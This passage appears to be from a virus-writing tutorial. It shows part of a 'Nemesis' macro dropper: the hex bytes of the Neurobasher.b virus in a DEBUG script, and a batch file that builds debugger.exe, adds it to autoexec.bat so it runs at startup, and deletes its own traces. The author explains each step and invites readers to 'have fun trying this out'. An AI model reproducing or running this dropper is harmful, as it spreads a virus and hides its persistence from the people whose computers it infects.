Print #1, "E 1160 AE 0F FF 0E 2A 0F 39 0F 3D 0F 46 0F 98 0F A3 0F"
Print #1, "E 1170 AE 0F E1 0E E1 0E FA 0E 0D 0F CB 0F EC 0F F5 0F"
Print #1, "E 1180 13 10 28 10 35 10 47 10 56 10 6E 10 79 10 80 10"
Print #1, "E 1190 8E 10 8B C6 89 F0 8D 04 56 58 74 77 73 74 EB 75"
Print #1, "E 11A0 E9 72 62 11 50 11 59 11 59 11 00 00 00 00 00 00"
Print #1, "E 11B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06"
Print #1, "E 11C0 07 03 03 04 05 07 07 01 02 05 08 10 28 74 7D 5F"
Print #1, "E 11D0 5F EC 10 E9 10 34 11 ED 10 13 11 F5 10 F9 10 0B"
Print #1, "E 11E0 11 17 11 23 11 F1 10 FE 10 3A 11 3E 11 2B 11 02"
Print #1, "E 11F0 11 B8 C0 05 F6 C6 01 74 03 B8 E8 2D E8 5B 00 88"
Print #1, "E 1200 67 9D B8 CC 45 AB 89 47 9E C3 B8 F0 35 EB ED B0"
Print #1, "E 1210 30 E8 5B 00 C6 47 97 31 B8 82 76 AB C3 4F B0 D1"
Print #1, "E 1220 AA 88 47 9D B8 C0 C0 F6 C6 01 74 03 B8 C8 C8 E8"
Print #1, "E 1230 28 00 B0 90 86 C4 89 47 9E C3 B0 00 E8 30 00 34"
Print #1, "E 1240 28 24 F8 40 88 47 97 EB CF B0 28 EB EF B0 10 E8"
Print #1, "E 1250 1D 00 34 08 EB EB B0 18 EB F5 8B 77 03 83 E6 03"
Print #1, "E 1260 02 40 1C AA C3 8B F2 83 E6 03 02 40 15 AA C3 8B"
Print #1, "E 1270 F2 83 E6 03 02 40 19 AA C3 B0 31 AA 88 47 97 B0"
Print #1, "E 1280 00 8B 77 03 83 E6 03 02 40 1F EB E3 B0 01 AA 34"
Print #1, "E 1290 28 88 47 97 EB E9 B0 29 EB F4 B0 11 AA 34 08 88"
Print #1, "E 12A0 47 97 EB DB B0 19 EB F4 B8 F7 15 AA 89 47 97 B0"
Print #1, "E 12B0 10 EB BC B8 F7 1D AA 89 47 97 B0 18 EB B1 B0 D1"
Print #1, "E 12C0 AA 88 47 97 B0 00 F7 C5 01 00 74 02 34 08 E8 9E"
Print #1, "E 12D0 FF 24 08 0C 05 34 08 88 47 98 C3 F6 C1 05 74 0E"
Print #1, "E 12E0 B0 40 E8 80 FF 50 B0 0F E8 E5 00 58 AA C3 B0 FF"
Print #1, "E 12F0 AA B0 C0 E8 6F FF 26 8B 45 FE AB C3 B4 C0 E8 13"
Print #1, "E 1300 00 B0 02 EB 07 B4 E8 E8 0A 00 B0 FE F6 C6 03 74"
Print #1, "E 1310 44 98 AB C3 B0 83 F6 C6 03 74 02 34 02 AA 8A C4"
Print #1, "E 1320 E9 42 FF B0 8D AA 8B F2 83 E6 03 8A 40 23 F6 C6"
Print #1, "E 1330 03 74 02 04 40 AA EB C9 B0 81 AA B0 F8 E8 25 FF"
Print #1, "E 1340 89 7F 11 AB C3 B0 B8 AA E8 F5 FF B0 2B AA B0 C0"
Print #1, "E 1350 E8 12 FF B0 F5 AA C3 B0 B8 AA E8 E3 FF B8 F7 D8"
Print #1, "E 1360 AB B0 03 AA EB E8 8B C2 24 03 75 CC 8B 77 09 83"
Print #1, "E 1370 E6 03 D1 E6 81 C6 82 0E A5 B0 3D AA EB C2 B0 B8"
Print #1, "E 1380 02 46 02 AA 8B 46 04 AB C3 B0 C7 AA B0 C0 EB F0"
Print #1, "E 1390 B0 8D AA 8A 46 02 98 C1 E0 03 04 06 EB E5 80 7E"
Print #1, "E 13A0 02 04 77 1C B0 B0 8A 66 04 02 46 02 96 B0 B4 8A"
Print #1, "E 13B0 66 05 02 46 02 F7 C7 01 00 75 01 96 AB 96 AB C3"
Print #1, "E 13C0 B0 68 AA 8B 46 04 AB B0 58 02 46 02 AA C3 B0 09"
Print #1, "E 13D0 98 96 E8 0D 00 25 0F 00 3B C6 77 F6 D1 E0 96 FF"
Print #1, "E 13E0 60 27 53 1E 0E 1F BB 97 04 8B 07 1F 43 03 DF 80"
Print #1, "E 13F0 E7 1F 2E 89 1E D7 10 5B C3 B0 FC AA C3 B0 FD AA"
Print #1, "E 1400 C3 B0 90 AA C3 B0 FA AA C3 B0 FB AA C3 C3 B0 98"
Print #1, "E 1410 AA C3 B8 F8 73 AB B8 01 EA AB C3 B0 B0 AA E8 C1"
Print #1, "E 1420 FF AA C3 B0 B4 EB F6 B0 8B AA E8 B5 FF 24 07 04"
Print #1, "E 1430 C0 AA C3 B0 B8 AA E8 A9 FF AB C3 B8 B4 4D AB B8"
Print #1, "E 1440 CD 21 AB C3 B8 8D 06 AB EB EC B0 25 EB E7 B0 0D"
Print #1, "E 1450 EB E3 E8 79 FF 8B 77 09 83 E6 03 D1 E6 FF 60 F8"
Print #1, "E 1460 B8 8C C8 AB B8 8E D8 AB C3 B0 0E AA E8 5F FF B0"
Print #1, "E 1470 1F AA C3 8A C1 24 07 3C 04 77 54 F6 47 03 03 74"
Print #1, "E 1480 4E E8 4A FF 8B 47 6F 89 47 94 50 8B 77 03 83 E6"
Print #1, "E 1490 03 8A 40 1C 8B 77 03 98 50 C1 EE 03 83 E6 03 55"
Print #1, "E 14A0 8B EC D1 E6 FF 50 E0 5D 58 58 C3 E8 20 FF 89 7F"
Print #1, "E 14B0 0F 6A FE 8B F2 83 E6 03 8A 40 15 8B F2 EB D8 B0"
Print #1, "E 14C0 0F E8 0C FF 8B 77 04 83 E6 03 D1 E6 FF 50 D0 C3"
Print #1, "E 14D0 8A C1 24 07 3C 04 77 F7 8A C5 25 03 00 D1 E0 96"
Print #1, "E 14E0 74 ED F6 47 03 03 74 E7 56 B0 0F E8 E2 FE 5E B0"
Print #1, "E 14F0 81 AA FF 60 C8 E9 11 F4 11 DF 02 25 02 0F 1B FF"
Print #1, "E 1500 54 F6 0F 08 DF 02 25 02 12 1B FF 6C F6 0F 08 00"
Print #1, "E 1510 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1520 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1530 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1540 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1550 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1560 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1570 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1580 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1590 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 15A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 15B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 15C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 15D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 15E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 15F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1600 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1610 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1620 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1630 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1640 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1650 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1660 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1670 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1680 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1690 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 16A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 16B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 16C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 16D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 16E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 16F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1700 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1710 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1720 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1730 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1740 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1750 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1760 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1770 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1780 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 1790 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 17A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 17B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 17C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 17D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "E 17E0 00 00 00 00 00 00 00 00 00 00 00 00"
Print #1, "RCX"
Print #1, "16EC"
Print #1, "W"
Print #1, "Q"
Print #1, ""
Close #1
'Create a file called c:\dos\exec.bat for putting in all
'the things that are behind "print #1" till "close #1"
'is found.
Open "c:\dos\exec.bat" For Output As #1
Print #1, "@echo off"
Print #1, "debug < script.scr>nul"
Print #1, "rem debugger.com"
Print #1, "echo @c:\dos\debugger.exe>>c:\autoexec.bat"
Print #1, "del c:\dos\script.scr"
Print #1, "del c:\dos\exec.bat"
Close #1
SetAttr "c:\autoexec.bat", 0 'Set the atribute of c:\autoexec.bat...
'to nothing.
ChDir "C:\DOS"
Shell "EXEC.BAT", 0
ChDir "C:\"
NoDropper:
----------------------------------------------------------------
The above is a piece of a Nemesis macro and it opens debug to create a file (debugger.exe) containing the Neurobasher.b virus.
The numbers are the hex codes of the Neurobasher.b virus.
Then a file called "c:\dos\exec.bat" is created and it contains everything behind the "print #1" until "close #1" is found. After that's done the virus will change the attributes of "c:\autoexec.bat" to editable (not readonly).
And finally the virus will change to the directory "c:\dos" and executes the "exec.bat" file that was created earlier, after that the virus will change to the "c:\" directory.
So the next time you start your computer the Neurobasher.b virus will be loaded. Have fun trying this out ;-)
--- Neophyte ---